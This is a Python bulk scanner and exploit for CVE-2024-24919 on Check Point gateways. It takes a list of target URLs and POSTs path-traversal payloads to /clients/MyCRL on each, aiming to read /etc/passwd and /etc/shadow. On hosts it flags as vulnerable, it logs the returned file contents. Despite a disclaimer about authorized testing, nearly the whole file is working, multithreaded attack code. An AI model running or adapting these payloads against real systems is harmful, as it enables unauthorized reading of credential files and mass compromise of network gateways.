CVE-2024-24919-auto-v2.py
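"""
CVE-2024-24919 bulk scanner.

Reads target URLs from a file, POSTs the known path-traversal payloads to
/clients/MyCRL on each host, fingerprints the Check Point response, and writes
hosts that appear vulnerable to checkpoint-results-v2.txt. (Summary of the
functions defined below.)
"""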
import requests
import re
from termcolor import colored
import urllib3
import sys
import argparse
import urllib.parse
from threading import Thread, Lock
from queue import Queue
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Global counters and results
success_count = 0
fail_count = 0
timeout_count = 0
total_urls = 0
vulnerable_urls = []
lock = Lock()

def display_header():
    header = """
     ____
____ _____ ___ _/_ | ____
/ \\\\__ \\\\ \\/ /| |/ \\
| | \\/ __ \\\\ / | | | \\
|___| (____ /\\_/ |___|___| /
 \\/ \\/ \\/
"""
    info = """
[CVE-2024-24919] Bulk Scanner
Intended only for educational use and authorized testing in corporate environments.
The author (https://twitter.com/nav1n0x/, https://github.com/ifconfig-me) takes no responsibility for this code; use at your own risk.
Do not attack a target you don't have permission to engage with.
"""
    print(colored(header, 'cyan'))
    print(colored(info, 'yellow'))

def check_vulnerability(response):
    # Treat a 200 response served over HTTP/1.0 that carries all of these
    # Check Point headers as a hit.
    expected_headers = {
        'Server': 'Check Point SVN foundation',
        'X-UA-Compatible': 'IE=EmulateIE7',
        'X-Frame-Options': 'SAMEORIGIN'
    }
    match_count = sum(1 for k, v in expected_headers.items() if response.headers.get(k) == v)
    status_line_match = response.status_code == 200 and response.raw.version == 10  # HTTP/1.0
    return match_count >= 3 and status_line_match

def log_request(f, url, method, headers, data, response, is_exception=False):
    # Append the request line, headers, body and the response (or exception) to the analysis log.
    f.write(f"{method} /clients/MyCRL HTTP/1.1\n")
    for key, value in headers.items():
        f.write(f"{key}: {value}\n")
    if data:
        f.write(f"\n{data}\n")
    if is_exception:
        f.write(f"\nResponse: {response}\n")
    else:
        f.write("\nResponse Headers:\n")
        for key, value in response.headers.items():
            f.write(f"{key}: {value}\n")
        f.write(f"\nResponse Body:\n{response.text}\n")
    f.write("=" * 80 + "\n")

def get_hostname(url):
    parsed_url = urllib.parse.urlparse(url)
    return parsed_url.netloc or parsed_url.path

def is_valid_url(url):
    try:
        parsed_url = urllib.parse.urlparse(url)
        return all([parsed_url.scheme, parsed_url.netloc])
    except Exception:
        return False

def post_request(url):
    global success_count, fail_count, timeout_count, vulnerable_urls
    if not is_valid_url(url):
        with lock:
            fail_count += 1
        return
    hostname = get_hostname(url)
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
        "Accept-Encoding": "gzip, deflate",
        "Accept": "*/*",
        "Connection": "close",
        "Host": hostname,
        "Content-Length": "39"
    }
    timeout = 3
    # Path-traversal payloads that try to read files outside the web root.
    payloads = [
        "aCSHELL/../../../../../../../etc/passwd",
        "aCSHELL/../../../../../../../etc/shadow"
    ]
    is_vulnerable = False
    # This is for analysis purposes only - feel free to remove this.
    for data in payloads:
        try:
            post_response = requests.post(url + "/clients/MyCRL", headers=headers, data=data, timeout=timeout, verify=False)
            if check_vulnerability(post_response):
                is_vulnerable = True
                with lock:
                    success_count += 1
                break
            else:
                with lock:
                    fail_count += 1
        except requests.exceptions.Timeout:
            with lock:
                timeout_count += 1
        except (requests.exceptions.RequestException, UnicodeError):
            with lock:
                fail_count += 1
    if is_vulnerable:
        with lock:
            vulnerable_urls.append(url)
        print(f"{colored(' Vulnerable URL found:', 'green')} {url}")
        # Re-send the payloads and log the full exchange for later analysis.
        with open("request-analyze-v2.txt", "a") as f:
            for data in payloads:
                try:
                    post_response = requests.post(url + "/clients/MyCRL", headers=headers, data=data, timeout=timeout, verify=False)
                    log_request(f, url, "POST", headers, data, post_response)
                except requests.exceptions.RequestException:
                    pass

def worker(queue):
    while True:
        url = queue.get()
        if url is None:
            break
        post_request(url)
        queue.task_done()
        update_progress()

def process_urls_from_file(file_path, num_threads):
    global total_urls
    with open(file_path, 'r') as file:
        urls = file.readlines()
    total_urls = len(urls)
    queue = Queue()
    for url in urls:
        url = url.strip()
        if not url.startswith("http://") and not url.startswith("https://"):
            url = "https://" + url
        queue.put(url)
    threads = []
    for _ in range(num_threads):
        thread = Thread(target=worker, args=(queue,))
        thread.start()
        threads.append(thread)
    queue.join()
    # Signal the workers to exit once the queue has been drained.
    for _ in range(num_threads):
        queue.put(None)
    for thread in threads:
        thread.join()
    # Save vulnerable URLs to a file
    with open("checkpoint-results-v2.txt", "w") as result_file:
        for url in vulnerable_urls:
            result_file.write(url + "\n")

def update_progress():
    with lock:
        scanned = success_count + fail_count + timeout_count
        remaining = total_urls - scanned
        progress_message = (f"{colored('Scanning:', 'yellow')} {scanned}/{total_urls} "
                            f"{colored('Remaining:', 'cyan')} {remaining} "
                            f"{colored('Success:', 'green')} {success_count}, "
                            f"{colored('Fail:', 'red')} {fail_count}, "
                            f"{colored('Timeout:', 'blue')} {timeout_count}")
        sys.stdout.write('\r' + progress_message)
        sys.stdout.flush()

def main():
    display_header()
    parser = argparse.ArgumentParser(description="Scan URLs for vulnerabilities.")
    parser.add_argument('-f', '--file', type=str, required=True, help="Path to the file containing URLs")
    parser.add_argument('-t', '--threads', type=int, default=10, help="Number of concurrent threads")
    args = parser.parse_args()
    process_urls_from_file(args.file, args.threads)
    # This part prints the vulnerable URLs at the end of the run. Feel free to hide it
    # if you have a bulk list, as it can make your terminal unresponsive.
    print("\n\nVulnerable URLs:")
    for url in vulnerable_urls:
        print(url)

if __name__ == "__main__":
    main()
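
# Example invocation (the targets file name below is only an illustration):
#   python CVE-2024-24919-auto-v2.py -f targets.txt -t 20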